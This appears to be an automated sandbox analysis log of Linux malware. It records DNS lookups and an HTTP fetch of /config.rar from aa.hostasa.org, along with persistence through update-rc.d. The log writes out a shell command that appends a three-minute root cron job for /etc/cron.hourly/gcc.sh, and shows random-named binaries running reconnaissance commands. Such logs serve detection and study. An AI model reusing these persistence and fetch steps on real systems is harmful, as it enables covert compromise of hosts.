                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Apr 4, 2023 19:53:10.082524061 CEST192.168.2.208.8.8.80x3c6dStandard query (0)aa.hostasa.orgA (IP address)IN (0x0001)false
                                                        Apr 4, 2023 19:53:10.084041119 CEST192.168.2.208.8.8.80xac2aStandard query (0)ppp.gggatat456.comA (IP address)IN (0x0001)false
                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Apr 4, 2023 19:53:10.113106966 CEST8.8.8.8192.168.2.200xac2aNo error (0)ppp.gggatat456.com54.36.145.106A (IP address)IN (0x0001)false
                                                        Apr 4, 2023 19:53:10.113106966 CEST8.8.8.8192.168.2.200xac2aNo error (0)ppp.gggatat456.com54.36.15.99A (IP address)IN (0x0001)false
                                                        Apr 4, 2023 19:53:10.113106966 CEST8.8.8.8192.168.2.200xac2aNo error (0)ppp.gggatat456.com79.137.1.133A (IP address)IN (0x0001)false
                                                        Apr 4, 2023 19:53:10.113106966 CEST8.8.8.8192.168.2.200xac2aNo error (0)ppp.gggatat456.com176.31.91.137A (IP address)IN (0x0001)false
                                                        Apr 4, 2023 19:53:10.113106966 CEST8.8.8.8192.168.2.200xac2aNo error (0)ppp.gggatat456.com54.36.15.97A (IP address)IN (0x0001)false
                                                        Apr 4, 2023 19:53:10.113106966 CEST8.8.8.8192.168.2.200xac2aNo error (0)ppp.gggatat456.com54.36.145.104A (IP address)IN (0x0001)false
                                                        Apr 4, 2023 19:53:10.113738060 CEST8.8.8.8192.168.2.200x3c6dNo error (0)aa.hostasa.org199.59.243.223A (IP address)IN (0x0001)false
                                                        • aa.hostasa.org
                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        0192.168.2.2055892199.59.243.22380
                                                        TimestampkBytes transferredDirectionData
                                                        Apr 4, 2023 19:53:10.133352041 CEST0OUTGET /config.rar HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: zh-cn
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
                                                        Host: aa.hostasa.org
                                                        Connection: Keep-Alive
                                                        Apr 4, 2023 19:53:10.335390091 CEST2INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Tue, 04 Apr 2023 17:53:10 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Set-Cookie: parking_session=5e40ce0e-6449-8a62-0de5-c1f1ec40fdb9; expires=Tue, 04-Apr-2023 18:08:10 GMT; Max-Age=900; path=/; HttpOnly
                                                        X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HN/fiQBlsr8tEc/m/6lbpbTguxMTcrFa2wKuYIROzvWRCjgKklCG7F44BwyBKAsElpHFohUkxLzlDHN5S9T6Bw==
                                                        Cache-Control: no-cache
                                                        Accept-CH: sec-ch-prefers-color-scheme
                                                        Critical-CH: sec-ch-prefers-color-scheme
                                                        Vary: sec-ch-prefers-color-scheme
                                                        Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                        Cache-Control: no-store, must-revalidate
                                                        Cache-Control: post-check=0, pre-check=0
                                                        Pragma: no-cache
                                                        Data Raw: 33 35 66 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 48 4e 2f 66 69 51 42 6c 73 72 38 74 45 63 2f 6d 2f 36 6c 62 70 62 54 67 75 78 4d 54 63 72 46 61 32 77 4b 75 59 49 52 4f 7a 76 57 52 43 6a 67 4b 6b 6c 43 47 37 46 34 34 42 77 79 42 4b 41 73 45 6c 70 48 46 6f 68 55 6b 78 4c 7a 6c 44 48 4e 35 53 39 54 36 42 77 3d 3d 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74
                                                        Data Ascii: 35f<!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_HN/fiQBlsr8tEc/m/6lbpbTguxMTcrFa2wKuYIROzvWRCjgKklCG7F44BwyBKAsElpHFohUkxLzlDHN5S9T6Bw=="><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="preconnect
                                                        Apr 4, 2023 19:53:10.335428953 CEST3INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f
                                                        Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiNWU0MGNlMGUtNjQ0OS04YTYyLTBkZTUtYzFmMWVjNDBmZGI5IiwicGFnZV90aW1lIjoxNjgwNjMwNzkwLCJwYWdlX3VybCI6Imh0dHA6XC9cL
                                                        Apr 4, 2023 19:53:10.347790956 CEST4INData Raw: 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 27 6f
                                                        Data Ascii: " href="https://www.google.com" crossorigin></head><body><div id="target" style='opacity: 0'></div><script>window.park = "eyJ1dWlkIjoiNWU0MGNlMGUtNjQ0OS04YTYyLTBkZTUtYzFmMWVjNDBmZGI5IiwicGFnZV90aW1lIjoxNjgwNjMwNzkwLCJwYWdlX3VybCI6Imh0dHA6XC9cL


                                                        System Behavior

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:/tmp/iJl2Sb6qRa
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/usr/sbin/update-rc.d
                                                        Arguments:/usr/bin/perl /usr/sbin/update-rc.d iJl2Sb6qRa defaults
                                                        File size:14437 bytes
                                                        MD5 hash:e9e125904f9ed8ff4c8504a55a149005

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/usr/sbin/update-rc.d
                                                        Arguments:n/a
                                                        File size:14437 bytes
                                                        MD5 hash:e9e125904f9ed8ff4c8504a55a149005

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/usr/lib/insserv/insserv
                                                        Arguments:/usr/lib/insserv/insserv iJl2Sb6qRa
                                                        File size:56512 bytes
                                                        MD5 hash:34c11674a0b29347001640aeae7c94f1

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/usr/sbin/update-rc.d
                                                        Arguments:n/a
                                                        File size:14437 bytes
                                                        MD5 hash:e9e125904f9ed8ff4c8504a55a149005

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/bin/systemctl
                                                        Arguments:systemctl daemon-reload
                                                        File size:659848 bytes
                                                        MD5 hash:b08096235b8c90203e17721264b5ce40

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/bin/dash
                                                        Arguments:sh -c "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab"
                                                        File size:154072 bytes
                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/bin/dash
                                                        Arguments:n/a
                                                        File size:154072 bytes
                                                        MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                        Start time:19:53:09
                                                        Start date:04/04/2023
                                                        Path:/bin/sed
                                                        Arguments:sed -i /\\/etc\\/cron.hourly\\/gcc.sh/d /etc/crontab
                                                        File size:73424 bytes
                                                        MD5 hash:c1a00c583ba08e728b10f3f46f5776d6

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lsodknzpps
                                                        Arguments:/usr/bin/lsodknzpps ls 9452
                                                        File size:548649 bytes
                                                        MD5 hash:a48ef1e0784bbcadf9025524cdf26387

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lsodknzpps
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:a48ef1e0784bbcadf9025524cdf26387

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lsodknzpps
                                                        Arguments:/usr/bin/lsodknzpps sh 9452
                                                        File size:548649 bytes
                                                        MD5 hash:a48ef1e0784bbcadf9025524cdf26387

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lsodknzpps
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:a48ef1e0784bbcadf9025524cdf26387

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lsodknzpps
                                                        Arguments:/usr/bin/lsodknzpps su 9452
                                                        File size:548649 bytes
                                                        MD5 hash:a48ef1e0784bbcadf9025524cdf26387

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lsodknzpps
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:a48ef1e0784bbcadf9025524cdf26387

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lsodknzpps
                                                        Arguments:/usr/bin/lsodknzpps id 9452
                                                        File size:548649 bytes
                                                        MD5 hash:a48ef1e0784bbcadf9025524cdf26387

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lsodknzpps
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:a48ef1e0784bbcadf9025524cdf26387

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lsodknzpps
                                                        Arguments:/usr/bin/lsodknzpps id 9452
                                                        File size:548649 bytes
                                                        MD5 hash:a48ef1e0784bbcadf9025524cdf26387

                                                        Start time:19:53:14
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/lsodknzpps
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:a48ef1e0784bbcadf9025524cdf26387

                                                        Start time:19:53:19
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:19
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/cjfywultqo
                                                        Arguments:/usr/bin/cjfywultqo top 9452
                                                        File size:548649 bytes
                                                        MD5 hash:90caf41492792c802131af2baa7a0bd1

                                                        Start time:19:53:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/cjfywultqo
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:90caf41492792c802131af2baa7a0bd1

                                                        Start time:19:53:19
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:19
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/cjfywultqo
                                                        Arguments:/usr/bin/cjfywultqo "ps -ef" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:90caf41492792c802131af2baa7a0bd1

                                                        Start time:19:53:19
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/cjfywultqo
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:90caf41492792c802131af2baa7a0bd1

                                                        Start time:19:53:20
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:20
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:20
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/cjfywultqo
                                                        Arguments:/usr/bin/cjfywultqo "cat resolv.conf" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:90caf41492792c802131af2baa7a0bd1

                                                        Start time:19:53:20
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/cjfywultqo
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:90caf41492792c802131af2baa7a0bd1

                                                        Start time:19:53:20
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:20
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:20
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/cjfywultqo
                                                        Arguments:/usr/bin/cjfywultqo id 9452
                                                        File size:548649 bytes
                                                        MD5 hash:90caf41492792c802131af2baa7a0bd1

                                                        Start time:19:53:20
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/cjfywultqo
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:90caf41492792c802131af2baa7a0bd1

                                                        Start time:19:53:20
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:20
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:20
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/cjfywultqo
                                                        Arguments:/usr/bin/cjfywultqo whoami 9452
                                                        File size:548649 bytes
                                                        MD5 hash:90caf41492792c802131af2baa7a0bd1

                                                        Start time:19:53:20
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/cjfywultqo
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:90caf41492792c802131af2baa7a0bd1

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ckxgqrmzxa
                                                        Arguments:/usr/bin/ckxgqrmzxa uptime 9452
                                                        File size:548649 bytes
                                                        MD5 hash:9ca1940212fee4aa01a0d75859be67ad

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ckxgqrmzxa
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:9ca1940212fee4aa01a0d75859be67ad

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ckxgqrmzxa
                                                        Arguments:/usr/bin/ckxgqrmzxa uptime 9452
                                                        File size:548649 bytes
                                                        MD5 hash:9ca1940212fee4aa01a0d75859be67ad

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ckxgqrmzxa
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:9ca1940212fee4aa01a0d75859be67ad

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ckxgqrmzxa
                                                        Arguments:/usr/bin/ckxgqrmzxa "sleep 1" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:9ca1940212fee4aa01a0d75859be67ad

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ckxgqrmzxa
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:9ca1940212fee4aa01a0d75859be67ad

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ckxgqrmzxa
                                                        Arguments:/usr/bin/ckxgqrmzxa uptime 9452
                                                        File size:548649 bytes
                                                        MD5 hash:9ca1940212fee4aa01a0d75859be67ad

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ckxgqrmzxa
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:9ca1940212fee4aa01a0d75859be67ad

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ckxgqrmzxa
                                                        Arguments:/usr/bin/ckxgqrmzxa "cd /etc" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:9ca1940212fee4aa01a0d75859be67ad

                                                        Start time:19:53:25
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/ckxgqrmzxa
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:9ca1940212fee4aa01a0d75859be67ad

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/dezqblvxuy
                                                        Arguments:/usr/bin/dezqblvxuy "cd /etc" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:28855a67a8446c5a6d01b3b3bf0b4b52

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/dezqblvxuy
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:28855a67a8446c5a6d01b3b3bf0b4b52

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/dezqblvxuy
                                                        Arguments:/usr/bin/dezqblvxuy "netstat -antop" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:28855a67a8446c5a6d01b3b3bf0b4b52

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/dezqblvxuy
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:28855a67a8446c5a6d01b3b3bf0b4b52

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/dezqblvxuy
                                                        Arguments:/usr/bin/dezqblvxuy "netstat -an" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:28855a67a8446c5a6d01b3b3bf0b4b52

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/dezqblvxuy
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:28855a67a8446c5a6d01b3b3bf0b4b52

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/dezqblvxuy
                                                        Arguments:/usr/bin/dezqblvxuy "ps -ef" 9452
                                                        File size:548649 bytes
                                                        MD5 hash:28855a67a8446c5a6d01b3b3bf0b4b52

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/dezqblvxuy
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:28855a67a8446c5a6d01b3b3bf0b4b52

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/tmp/iJl2Sb6qRa
                                                        Arguments:n/a
                                                        File size:548638 bytes
                                                        MD5 hash:58881cdfffced4e9013ee3ffe4fdc941

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/dezqblvxuy
                                                        Arguments:/usr/bin/dezqblvxuy pwd 9452
                                                        File size:548649 bytes
                                                        MD5 hash:28855a67a8446c5a6d01b3b3bf0b4b52

                                                        Start time:19:53:31
                                                        Start date:04/04/2023
                                                        Path:/usr/bin/dezqblvxuy
                                                        Arguments:n/a
                                                        File size:548649 bytes
                                                        MD5 hash:28855a67a8446c5a6d01b3b3bf0b4b52

